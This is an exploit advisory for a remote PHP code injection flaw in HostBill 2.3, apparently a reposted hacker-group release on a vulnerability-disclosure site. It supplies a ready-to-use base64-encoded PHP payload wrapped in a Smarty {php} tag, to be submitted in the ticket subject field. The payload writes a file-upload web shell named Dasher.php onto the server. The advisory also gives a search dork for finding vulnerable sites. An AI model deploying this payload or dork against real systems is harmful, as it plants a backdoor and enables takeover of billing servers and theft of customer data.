HostBill 2.3 Remote Code Injection

2012.01.31
Credit: Dr.DaShE
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-94

=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah, The Most Beneficent, The Most Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [~] Tybe: suffering from RemotE injection php code [~] Vendor:hostbillapp.com [+] Software:HostBill [+] Version : v2.3 [~] [+] author:Dr.DaShE [~] TEAM: Team 403 [?] [-] contact: Dasher403[at]gmail.com [?] Date: 2g.J4N.2oll [?] [?] T!ME: 04:46 AM ara-blackhat [^] [?] =============================================================================== # HostBill script suffering from RemotE injection php code exploit =============================================================================== [!] Exploit Already Tested ... on apache linux server Dork: Powered by HostBill [^] Error console:- http://localhost/billing/index.php?/tickets/new/ [?] poC <X> exploit:- http://localhost/billing/index.php?/tickets/new/ inject your evil php code exploit in subject field encrypt by base64 encoder ex: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJEYXNoZXIucGhwIiwidyIpOwpm d3JpdGUoJGZvLCRjb2RlKTs='));{/php} http://localhost/Dasher.php [~]-----------------------------{(Team 403)}------------------------------------------------ # [~] Greetz tO:Nex & WeeD & R3d D3v!L & HITLR & Red virus & Dr.Dmar & MaFiA & Mr.NsaaNy & ...etc ; # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; # [?] special SupPoRT : ABH-Sec.Com & packet storm & 1337day & Maksymilian Arciemowicz # ; # [~]spechial FR!ND: they all are spechials ;) #; # [~] !'M 4R48!4N 3XPL0!73R. #; # [~](>D!R 4ll 0R D!E<) #; # [~]---------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top